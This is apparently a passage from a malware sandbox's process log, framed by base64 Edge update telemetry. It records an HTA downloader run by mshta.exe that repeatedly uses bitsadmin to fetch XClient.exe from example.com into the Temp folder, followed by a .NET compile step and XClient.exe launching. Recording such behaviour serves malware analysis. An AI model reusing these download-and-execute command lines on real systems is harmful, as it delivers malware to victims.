iLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTcyNDIxMzgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy8zMjc5OThlMy00MTM0LTRlYjEtYThlZi0xYTY3N2ZlMGIyNTk_UDE9MTcxNjQ3MDEwOSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1XaSUyZlYxbmh4M1R1YVJ2cG5DN3VZZHJpdDFpWXMza2NOTlJtY0dzbEFZdnFNdlk0M3BMJTJmR0RHeXZQUXdBaG44NkI0eWMlMmJ0TjZlZHBvemZyNVJQV2olMmJRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjE2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTcyNDIxMzgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzMyNzk5OGUzLTQxMzQtNGViMS1hOGVmLTFhNjc3ZmUwYjI1OT9QMT0xNzE2NDcwMTA5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PVdpJTJmVjFuaHgzVHVhUnZwbkM3dVlkcml0MWlZczNrY05OUm1jR3NsQVl2cU12WTQzcEwlMmZHREd5dlBRd0Fobjg2QjR5YyUyYnRONmVkcG96ZnI1UlBXaiUyYlElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIxNzI4MjEwNjQiIHRvdGFsPSIxNzI4MjEwNjQiIGRvd25sb2FkX3RpbWVfbXM9IjI1ODc2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTczOTg1MTciIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzU3MTc3MzY5NSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM5OTk5NTM2NjMiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSIyNzgxIiBkb3dubG9hZF90aW1lX21zPSIyODE0MSIgZG93bmxvYWRlZD0iMTcyODIxMDY0IiB0b3RhbD0iMTcyODIxMDY0IiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSI0MjgxOCIvPjwvYXBwPjxhcHAgYXBwaWQ9InsxRkFCOENGRS05ODYwLTQxNUMtQTZDQS1BQTdEMTIwMjE5NDB9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIyLjAuMC4zNCIgbGFuZz0iIiBicmFuZD0iRVVGSSIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEyODM4MzM1Mzg3IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTI4MzgzMzUzODciIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMCIgZXJyb3Jjb2RlPSItMjE0NzAyMzgzOCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTMyNjY3NzQxODkiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImRvIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy81ZjE5NTYxMi0zODRhLTQ4ZWEtODQwOC1iNGVkZTlkYzU2YmI_UDE9MTcxNjQ3MDExMCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1IYzNsN1RrQWpRdXdQa0FzWnJEUEplWlA5VU9HU0pBNDY4UU95dnNydXRBM1dYaTdVNzhhTlZ6bTczenRHbDc3M2wyanhOMTNyeWFKcTZzcGh5dFE0QSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjAiIHRvdGFsPSIwIiBkb3dubG9hZF90aW1lX21zPSIxNiIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzMjY2Nzc0MTg5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy81ZjE5NTYxMi0zODRhLTQ4ZWEtODQwOC1iNGVkZTlkYzU2YmI_UDE9MTcxNjQ3MDExMCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1IYzNsN1RrQWpRdXdQa0FzWnJEUEplWlA5VU9HU0pBNDY4UU95dnNydXRBM1dYaTdVNzhhTlZ6bTczenRHbDc3M2wyanhOMTNyeWFKcTZzcGh5dFE0QSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE4MDQ0NDQ4IiB0b3RhbD0iMTgwNDQ0NDgiIGRvd25sb2FkX3RpbWVfbXM9IjQyNDUzIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTMyNjY5Mjg3NjkiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzI3MzE3ODY4MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzMjc1OTkxMTI4IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMjc4MSIgZG93bmxvYWRfdGltZV9tcz0iNDI4MTMiIGRvd25sb2FkZWQ9IjE4MDQ0NDQ4IiB0b3RhbD0iMTgwNDQ0NDgiIHBhY2thZ2VfY2FjaGVfcmVzdWx0PSIwIiBpbnN0YWxsX3RpbWVfbXM9IjI4MSIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\65c21cc89d7241d08029fd3d521a3d0d /t 3972 /p 1416

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\a284fa71977c4d07b165b4e01ea74755 /t 2528 /p 3036

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\bf7dfa9e02594b0ba45c304c5909f3aa /t 5924 /p 2748

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nwziktfv\nwziktfv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA45.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc452407B64AF34E638FEE2B663DFEA14.TMP"

C:\Users\Admin\Desktop\XClient.exe

"C:\Users\Admin\Desktop\XClient.exe"

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\84e674974693413fb2da20541d821761 /t 5508 /p 4760

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\6ddd34487f6d4558aea4391e53af883e /t 3068 /p 5152

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\f3823bc9b97c462f89116c5ece3af7df /t 5792 /p 2436

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\MicrosoftEdge_X64_124.0.2478.105.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6878888c0,0x7ff6878888cc,0x7ff6878888d8

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6878888c0,0x7ff6878888cc,0x7ff6878888d8

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff653c988c0,0x7ff653c988cc,0x7ff653c988d8

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k AppReadiness -p -s AppReadiness

C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe

"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub prelaunch

C:\Windows\system32\wwahost.exe

"C:\Windows\system32\wwahost.exe" -ServerName:Microsoft.MicrosoftOfficeHub.wwa

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkVDOTVCOTQtRkJERS00OTU5LTg2RkItNTM1RTY2Q0NCNzBEfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntCQkQyNDYwMy0xMzE3LTQyNjUtQTMyRS03MkJDMTUxMzA2ODF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RDZqeFBlVW1LZmg4eXR5NkYwN1l4TTFlWkRIL1RWNkZRVDJmZkRpWnl3dz0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE4Ny4zNyIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJJc09uSW50ZXJ2YWxDb21tYW5kc0FsbG93ZWQ9LXRhcmdldF9kZXY7UHJvZHVjdHNUb1JlZ2lzdGVyPSU3QjFGQUI4Q0ZFLTk4NjAtNDE1Qy1BNkNBLUFBN0QxMjAyMTk0MCU3RCIgaW5zdGFsbGFnZT0iMTkiIGNvaG9ydD0icnJmQDAuMDIiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iMjAiIHJkPSI2MzI1IiBwaW5nX2ZyZXNobmVzcz0iezUyQ0QxQ0Y1LTIzMEYtNDQ4OS1BRUVBLTgwNjVBOEZBNDUzMn0iLz48L2FwcD48YXBwIGFwcGlkPSJ7NTZFQjE4RjgtQjAwOC00Q0JELUI2RDItOEM5N0ZFN0U5MDYyfSIgdmVyc2lvbj0iOTIuMC45MDIuNjciIG5leHR2ZXJzaW9uPSIxMjQuMC4yNDc4LjEwNSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIxOSIgaXNfcGlubmVkX3N5c3RlbT0idHJ1ZSIgbGFzdF9sYXVuY2hfY291bnQ9IjEiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMzU4NjEwOTMyMTk1Njc3MCI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSIxMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQyNDU0MjIyNjQiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTQyNDU1Nzg2NTYiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1MTI1NjgwNzYzIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJkbyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNGFkZDFhZWQtNDdiOC00MDhjLTlmMDQtMzMwZWZiYzYwZTM5P1AxPTE3MTY0NzAyNTAmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9REVxdWFYcjc2UENqY1VGaTNIak9FSjhOY2pzRGpGZ2xnbHA0TmF4cTFpaFFwRjVxS0t5OUpjUTNGcTBTJTJmSzJpckFtOTRxaFdjNm5NQlpCemxhJTJmbFlBJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxMjU4MzcxNzIiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzRhZGQxYWVkLTQ3YjgtNDA4Yy05ZjA0LTMzMGVmYmM2MGUzOT9QMT0xNzE2NDcwMjUwJmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PURFcXVhWHI3NlBDamNVRmkzSGpPRUo4TmNqc0RqRmdsZ2xwNE5heHExaWhRcEY1cUtLeTlKY1EzRnEwUyUyZksyaXJBbTk0cWhXYzZuTUJaQnpsYSUyZmxZQSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3MjgwMTA4MCIgdG90YWw9IjE3MjgwMTA4MCIgZG93bmxvYWRfdGltZV9tcz0iODU5NzkiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxMjU5OTM0MDEiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29k